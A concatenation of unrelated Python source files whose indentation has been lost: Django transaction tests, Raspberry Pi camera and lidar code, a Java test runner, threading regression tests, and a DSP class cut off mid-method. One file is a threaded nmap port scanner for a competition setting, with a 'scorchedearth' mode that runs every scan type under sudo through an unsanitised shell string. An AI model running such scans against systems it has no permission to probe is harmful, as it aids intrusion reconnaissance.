        We would get an XG error if the inner transaction was not independent
"""
from .test_connector import TestUser, TestFruit
@transaction.atomic
def txn1(_username, _fruit):
@transaction.atomic(independent=True)
def txn2(_fruit):
TestFruit.objects.create(name=_fruit, color="pink")
raise ValueError()
TestUser.objects.create(username=_username)
txn2(_fruit)
with self.assertRaises(ValueError):
txn1("test", "banana")
def test_nested_decorator(self):
# Nested decorator pattern we discovered can cause a connection_stack
# underflow.
@transaction.atomic
def inner_txn():
pass
@transaction.atomic
def outer_txn():
inner_txn()
# Calling inner_txn first puts it in a state which means it doesn't
# then behave properly in a nested transaction.
inner_txn()
outer_txn()
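# The transaction API exercised by the tests above, in brief (a sketch drawn
# from these tests, not canonical djangae documentation):
#
#     @transaction.atomic                          # decorator form
#     def txn(): ...
#
#     with transaction.atomic(xg=True):            # context manager, cross-group
#         ...
#
#     with transaction.atomic(independent=True):   # independent nested transaction
#         ...
#
#     with transaction.non_atomic():               # step outside an enclosing transaction
#         ...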
class TransactionStateTests(TestCase):
def test_has_already_read(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
pear = TestFruit.objects.create(name="Pear", color="Green")
with transaction.atomic(xg=True) as txn:
self.assertFalse(txn.has_been_read(apple))
self.assertFalse(txn.has_been_read(pear))
apple.refresh_from_db()
self.assertTrue(txn.has_been_read(apple))
self.assertFalse(txn.has_been_read(pear))
with transaction.atomic(xg=True) as txn:
self.assertTrue(txn.has_been_read(apple))
self.assertFalse(txn.has_been_read(pear))
pear.refresh_from_db()
self.assertTrue(txn.has_been_read(pear))
with transaction.atomic(independent=True) as txn2:
self.assertFalse(txn2.has_been_read(apple))
self.assertFalse(txn2.has_been_read(pear))
def test_prevent_read(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
# Don't allow reading apple within the transaction
with transaction.atomic() as txn:
txn.prevent_read(TestFruit, apple.pk)
self.assertRaises(
transaction.PreventedReadError,
TestFruit.objects.get, pk=apple.pk
)
def test_refresh_if_unread(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
with transaction.atomic() as txn:
apple.color = "Pink"
txn.refresh_if_unread(apple)
self.assertEqual(apple.name, "Apple")
apple.color = "Pink"
# Already been read this transaction, don't read it again!
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
def test_refresh_if_unread_for_created_objects(self):
""" refresh_if_unread should not refresh objects which have been *created* within the
transaction, as at the DB level they will not exist.
"""
from .test_connector import TestFruit
# With caching
with transaction.atomic() as txn:
apple = TestFruit.objects.create(name="Apple", color="Red")
apple.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
# Without caching
with DisableCache():
with transaction.atomic() as txn:
apple = TestFruit.objects.create(name="Radish", color="Red")
apple.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
def test_refresh_if_unread_for_resaved_objects(self):
""" refresh_if_unread should not refresh objects which have been re-saved within the
transaction.
"""
from .test_connector import TestFruit
# With caching
apple = TestFruit.objects.create(name="Apple", color="Red")
with transaction.atomic() as txn:
apple.save()
apple.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
# Without caching
radish = TestFruit.objects.create(name="Radish", color="Red")
with DisableCache():
with transaction.atomic() as txn:
radish.save()
radish.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(radish)
self.assertEqual(radish.color, "Pink")
def test_non_atomic_only(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
apple.save()
apple2 = TestFruit.objects.get(pk=apple.pk)
with transaction.non_atomic():
apple.delete()
# Apple should no longer be in the cache!
self.assertRaises(TestFruit.DoesNotExist, apple2.refresh_from_db)
|
picamera.py
|
#!/usr/bin/python2.7
#
# Copyright (C) 2016 by meiraspi@gmail.com published under the MIT License
#
# display pygame window from picamera
#
# http://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
# https://www.snip2code.com/Snippet/979508/OpenCV-VideoCapture-running-on-PyGame-on
#
from datetime import datetime
from picamera.array import PiRGBArray
from threading import Thread
from pygame.locals import *
from time import sleep
from sys import exit
import numpy as np
import pygame
import picamera
class PiVideoStream:
def __init__(self, resolution=(320, 240), format='rgb', framerate=32, led=True):
# initialize the camera and stream
self.camera = picamera.PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format=format, use_video_port=True)
# initialize the frame and the variable used to indicate if the thread should be stopped
self.frame = None
        self.stopped = False
        self.led = led
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
        self.camera.led = self.led
return self
def update(self):
# keep looping infinitely until the thread is stopped
for frameBuf in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = np.rot90(frameBuf.array)
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
            # and release camera resources
if self.stopped:
self.camera.led = False
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
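# Minimal lifecycle sketch for the class above (assumes a Pi camera is attached):
#
#     vs = PiVideoStream(resolution=(320, 240)).start()
#     sleep(0.2)            # give the capture thread time to deliver a frame
#     frame = vs.read()     # latest frame as a rotated numpy array
#     vs.stop()             # stops the thread and releases the camera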
def update_stream_screen(videostream, screen):
dirtyrects = []
frame = pygame.surfarray.make_surface(videostream.read())
#dirtyrects.append( screen.fill(black) )
dirtyrects.append( screen.blit(frame, (30,30)) )
pygame.display.update(dirtyrects)
if __name__ == '__main__':
width = 640
height = 480
# colors R G B
white = (255, 255, 255)
red = (255, 0, 0)
green = ( 0, 255, 0)
blue = ( 0, 0, 255)
black = ( 0, 0, 0)
cyan = ( 50, 255, 255)
magenta = (255, 0, 255)
yellow = (255, 255, 0)
orange = (255, 127, 0)
size = (width, height)
xmax = width - 2
ymax = height - 1
try:
pygame.init()
window = pygame.display.set_mode(size)
window.fill(black)
pygame.display.set_caption("picamera stream on pygame")
clock = pygame.time.Clock()
vs = PiVideoStream().start()
sleep(0.2)
while True:
clock.tick(30)
for event in pygame.event.get():
if event.type in (QUIT, KEYDOWN):
exit()
update_stream_screen(vs, window)
print 'FRAMERATE: %.3f fps' % clock.get_fps()
except (KeyboardInterrupt, SystemExit):
print 'Quit'
vs.stop()
pygame.quit()
except Exception, error:
print "Error: " + str(error)
exit()
|
quiet-scan-threaded.py
|
#!/usr/bin/env python3
import subprocess
import sys, getopt, os
import threading
import argparse
cwd = os.getcwd()
path = cwd + "/port_scanner_files/"
ip_list_file = path + "input/IP_list.txt"
nmap_output_file = path + "temp_output/nmap_output"
#the scorchedearth option runs every nmap scan that doesn't require an additional host OR standard ping scan
scorchedearth = ["-sS", "-sT", "-sA", "-sW", "-sM", "-sU", "-sN", "-sF", "-sX", "-sY","-sZ", "-sO"]
def module_name():
return "quiet-scan-threaded"
def module_help():
return "quiet port scanner tool (threaded)"
def module_usage():
return "{0}".format(module_name())
def system_call(program_name, args = [], privilege = False):
call = program_name
if(privilege == True):
call = "sudo " + call
for arg in args:
call = call + " " + arg
print(call)
subprocess.call(call, shell=True)
def parse_nmap_output(ipAddr, scantype, nmap_output):
services_list = path + "scan_output/services_list" + "_" + ipAddr + ".txt"
nmap_fp = open(nmap_output, 'r')
line_in = nmap_fp.readline()
    # Skip ahead to the port table header; "STATE" and "SERVICE" are checked separately
    # because nmap sometimes inserts extra whitespace between the column names, and the
    # loop also stops at end of file so it cannot spin forever when no header is printed.
    while(line_in and line_in.find("STATE") == -1 and line_in.find("SERVICE") == -1):
        line_in = nmap_fp.readline()
    if(not line_in or line_in.lower().find("nmap done") != -1): #no open ports: nothing to record
        nmap_fp.close()
        return
#changed to append, so we can get results from all scan types
services_fp = open(services_list, 'a')
line_in = nmap_fp.readline()
while (line_in and line_in.strip() != ''):
if(line_in.lower().find("closed") != -1): #IF port is closed, continue parsing the next line
line_in = nmap_fp.readline()
continue
str_split = line_in.split('/')
str_split_2 = str_split[-1].split(' ')
line_out_list = []
line_out_list.append(str_split[0])
line_out_list.extend(str_split_2)
line_out = ' '.join(line_out_list)
services_fp.write("Scanned with: " + scantype + "\n")#write what scan produced these results
services_fp.write(line_out)
line_in = nmap_fp.readline()
services_fp.close()
nmap_fp.close()
def buildArgs(argv, line, fileName):
arr = [line.strip()]
if(len(argv) > 0):
arr.extend(argv)
arr.append("-Pn") #controversial addition: we know all the hosts are going to be online because of the game rules, so adding this skips the host discovery
arr.extend([">", fileName])
return arr
def nmap_worker(line, scantype, standard_args):
#since we are appending multiple scan results to one file, zero out the file before start
line = line.strip()
services_list = path + "scan_output/services_list" + "_" + line + ".txt"
services_fp = open(services_list, 'w')
services_fp.close()
    if ("scorchedearth" in scantype) or ("se" in scantype):
scantype = scorchedearth
for scan in scantype:
print("Starting NMAP Thread for " + line +":" + " Scantype: " + scan)
fileName = nmap_output_file + "_" + line + ".txt"
system_call(("nmap " + scan), buildArgs(standard_args, line, fileName), True) #-p- to scan all the ports
parse_nmap_output(line, scan, fileName)
def main():
with open(ip_list_file ,'r') as file:
line = file.readline()
#New calling convention is two lists of arguments: the scan type and whatever other arguments there are
#example python3 quiet-scan-threaded.py --scantype "-sS -sN" --options "-p 80 -sV"
parser = argparse.ArgumentParser()
        parser.add_argument('--scantype', dest='scantype', required=True, help="List all scan types here. Format as if calling nmap, e.g. '-sS -sU -sM'. To automatically run all scan types enter 'scorchedearth' or 'se'")
parser.add_argument('--options', dest= 'standard_args', nargs='+', required=True, help="All options other than scan type listed here, just as if calling nmap from the commandline")
args = parser.parse_args()
standard_args = args.standard_args
scans = args.scantype
scantype = scans.split(' ')
while line:
t = threading.Thread(target=nmap_worker, args=(line, scantype, standard_args))
t.start()
line = file.readline()
if __name__ == "__main__":
main()
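# Note: the worker threads above are fire-and-forget. A hedged variant of the
# loop in main() that waits for every scan to finish before the script exits
# could collect the threads and join them:
#
#     threads = []
#     while line:
#         t = threading.Thread(target=nmap_worker, args=(line, scantype, standard_args))
#         t.start()
#         threads.append(t)
#         line = file.readline()
#     for t in threads:
#         t.join()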
|
main.py
|
from threading import Timer, Thread
import time
import os
import sys
def kill():
print("TLE")
exit(1)
testCases = int(sys.argv[1])
timeLimit = int(sys.argv[2])
def runCode(timeout):
if os.system("javac /source/code.java > /source/out/compile_out.txt 2> /source/out/compile_error.txt") != 0:
print("compile_error")
timeout.cancel()
exit(1)
for i in range(testCases):
result = "ok"
if os.system("cd /source && java code < /source/in{0}.txt > /source/out/out{0}.txt 2> /source/out/err{0}.txt".format(i)) != 0:
result = "runtime_error"
with open("/source/out/result{0}.txt".format(i), "w") as f:
f.write(result)
print("ok")
timeout.cancel()
exit(0)
timeout = Timer(timeLimit, kill)
timeout.start()
thread = Thread(target=runCode, args=(timeout,), daemon=True)
thread.start()
|
lidar.py
|
from rplidar import RPLidar
import time
from multiprocessing import Pipe
from threading import Thread, Event
class LidarController(object):
"""
Asynchronous controller for the rplidar.
"""
def __init__(self, port='/dev/ttyUSB0'):
self.lidar = RPLidar(port)
print('LidarController:', self.lidar.get_info())
print('LidarController:', self.lidar.get_health())
time.sleep(1)
self._start_reading_data()
def _create_background_reader(self, pipeout, stopsig):
print('LidarController: background thread started.')
for scan in self.lidar.iter_scans():
if stopsig.is_set():
print('LidarController: background thread finished.')
return
_, angles, dists = zip(*scan)
pipeout.send((angles, dists))
def _start_reading_data(self):
self.pipein, pipeout = Pipe()
self.stopsig = Event()
Thread(target=self._create_background_reader, args=(pipeout, self.stopsig)).start()
def stop(self):
self.lidar.stop_motor()
self.stopsig.set()
def scan(self):
"""
        Return the latest rplidar scan. If no scan has arrived yet, this call blocks
        until the background reader thread delivers the first one; after that it
        drains the pipe and returns the most recent scan without blocking.
        :return: latest scan - (angles, distances)
"""
scan = None, None
is_first = True
while self.pipein.poll() or is_first:
scan = self.pipein.recv()
is_first = False
return scan
if __name__ == '__main__':
lidar = LidarController()
scan_num = 0
for i in range(3):
angles, dists = lidar.scan()
time.sleep(1)
print(angles, dists)
lidar.stop()
|
test_threading.py
|
###
### This is a verbatim copy of the "test_threading" regression tests from
### the standard Python distribution (svn revision 77924 to be precise) with
### some simple changes to make it run using threading2:
###
### * "import threading" => "import threading2 as threading"
### * "from test import lock_tests" => "from stdregr import lock_tests"
### * "self.assertIn(a,b)" => "self.assertTrue(a in b)"
### * "self.assertNotIn(a,b)" => "self.assertFalse(a in b)"
### * "self.assertIsInstance(a,b)" => "self.assertTrue(isinstance(a,b))"
### * disabled test_main so it's not detected by nose, py.test, etc.
### * disabled test_join_nondaemon_on_shutdown; it fails on old pythons
###
###
### If you want to get technical, the copyright for this file is thus:
###
### Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010
### Python Software Foundation; All Rights Reserved
###
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
import threading2 as threading
import thread
import time
import unittest
import weakref
from threading2.tests.stdregr import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertTrue(tid in threading._active)
self.assertTrue(isinstance(threading._active[tid],threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""])
        self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
# def test_join_nondaemon_on_shutdown(self):
# # Issue 1722344
# # Raising SystemExit skipped threading._shutdown
# import subprocess
# p = subprocess.Popen([sys.executable, "-c", """if 1:
# import threading
# from time import sleep
#
# def child():
# sleep(1)
# # As a non-daemon thread we SHOULD wake up and nothing
# # should be torn down yet
# print "Woke up, sleep function is:", sleep
#
# threading.Thread(target=child).start()
# raise SystemExit
# """],
# stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout, stderr = p.communicate()
# self.assertEqual(stdout.strip(),
# "Woke up, sleep function is: <built-in function sleep>")
# stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
# self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
' due to known OS bugs on'), sys.platform
return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
#def test_main():
# test.test_support.run_unittest(LockTests, RLockTests, EventTests,
# ConditionAsRLockTests, ConditionTests,
# SemaphoreTests, BoundedSemaphoreTests,
# ThreadTests,
# ThreadJoinOnShutdown,
# ThreadingExceptionTests,
# )
#
#if __name__ == "__main__":
# test_main()
|
__init__.py
|
#f2_dsp class
# Last modification by Marko Kosunen, marko.kosunen@aalto.fi, 14.11.2018 11:44
import numpy as np
import scipy.signal as sig
import tempfile
import subprocess
import shlex
import time
from thesdk import *
from f2_util_classes import *
from f2_decimator import *
import signal_generator_802_11n as sg80211n
class f2_rx_dsp(verilog,thesdk):
@property
def _classfile(self):
return os.path.dirname(os.path.realpath(__file__)) + "/"+__name__
def __init__(self,*arg):
self.proplist = [ 'Rs',
'Rs_dsp',
'Rxantennas',
'Users',
'dsp_decimator_scales', # Scales for the rx decimator chain
'dsp_decimator_cic3shift', # Left-shift for the decimator cic integrator
'rx_output_mode'
];
self.Rs = 160e6; # sampling frequency
self.Rs_dsp=20e6
#These are fixed
self.Rxantennas=4
self.Users=4
self.Rxindex=0
self.Userindex=0
self.iptr_A = IO()
self.model='py'; #can be set externally, but is not propagated
        self.dsp_decimator_model='py' #Used only for python model but can be set for testing
self.dsp_decimator_scales=[1,1,1,1]
self.dsp_decimator_cic3shift=0
self.rtldiscard=50
self.rx_output_mode=1
#self.dspmode='local'; # [ 'local' | 'cpu' ]
self.par= False #by default, no parallel processing
self.queue= [] #by default, no parallel processing
self.DEBUG= False
if len(arg)>=1:
parent=arg[0]
self.copy_propval(parent,self.proplist)
self.parent =parent;
#What is outputted to these 4 ports is selected with modes
self.iptr_A.Data=[IO() for _ in range(self.Rxantennas)]
self._io_ofifo=iofifosigs(**{'users':self.Users})
self.preserve_iofiles='False'
self.init()
def init(self):
self.def_verilog()
#Add decimator
self.decimator=[ f2_decimator() for i in range(self.Rxantennas)]
for i in range(self.Rxantennas):
self.decimator[i].Rs_high=self.Rs
self.decimator[i].Rs_low=self.Rs_dsp
self.decimator[i].model=self.dsp_decimator_model
self.decimator[i].iptr_A=self.iptr_A.Data[i]
self.decimator[i].scales=self.dsp_decimator_scales
self.decimator[i].cic3shift=self.dsp_decimator_cic3shift
self.decimator[i].init()
self.mode=self.decimator[0].mode
self._vlogmodulefiles =list(['clkdiv_n_2_4_8.v' ,'AsyncResetReg.v'])
self._vlogparameters=dict([ ('g_Rs_high',self.Rs), ('g_Rs_low',self.Rs_dsp),
('g_scale0',self.dsp_decimator_scales[0]),
('g_scale1',self.dsp_decimator_scales[1]),
('g_scale2',self.dsp_decimator_scales[2]),
('g_scale3',self.dsp_decimator_scales[3]),
('g_cic3shift', self.dsp_decimator_cic3shift),
('g_mode',self.mode),
('g_user_index', 0),
('g_antenna_index', 0),
('g_rx_output_mode', self.rx_output_mode),
('g_input_mode', 0),
('g_adc_fifo_lut_mode' ,2)
])
def run(self,*arg):
if len(arg)>0:
self.par=True #flag for parallel processing
self.queue=arg[0] #multiprocessing.queue as the first argument
if self.model=='py':
self.process_input()
else:
self.write_infile()
self.run_verilog()
self.read_outfile()
def process_input(self):
#Could use parallel forloop here
[ self.decimator[i].run() for i in range(self.Rxantennas) ]
        #Run decimators in parallel
#Split in two phases: First, get the channel estimates
# l=0
# que=[]
# proc=[]
# for i in range(self.Rxantennas):
# self.decimator[i].init()
# que.append(multiprocessing.Queue())
# proc.append(multiprocessing.Process(target=self.decimator[i].run, args=(que[l],)))
# proc[l].start()
# l += 1
#
# #Collect results for dsps
# l=0
# for i in range(self.Rxantennas):
# for k in range(self.Users):
# self._decimated.Data[k].Data=que[l].get()
# proc2[l].join()
# l+=1
#Each of the RX's provide self.Users datastreams
####################
### At this point we should add the beamforming and the demodulation
### BUT CURRENTLY WE DO NOT:
####################
        self.print_log(type='W', msg='Discarded %i zero samples to remove possible initial transients in symbol sync.' %(self.rtldiscard))
        #Array (antennas,time,users) of decimated data streams
decimated= [ self.decimator[i]._Z.Data.reshape(-1,1)[self.rtldiscard::,0].reshape(-1,1)@np.ones((1,self.Users)) for i in range(self.Rxantennas)]
sumuserstream=np.sum(decimated,0)
seluser=[ decimated[i][:,self.Userindex].reshape(-1,1) for i in range(self.Rxantennas)]
selrx=[ decimated[self.Rxindex][:,i].reshape(-1,1) for i in range(self.Users)]
selrxuser=decimated[self.Rxindex][:,self.Userindex].reshape(-1,1)
if (self.rx_output_mode==0):
            self.print_log(type='I', msg="Applying RX output mode %s - Bypass" %(self.rx_output_mode) )
            #Bypass: the sampling rate is NOT reduced
for k in range(self.Rxantennas):
self._io_ofifo.data[k].udata.Data=self.iptr_A.Data[k].Data.reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==1):
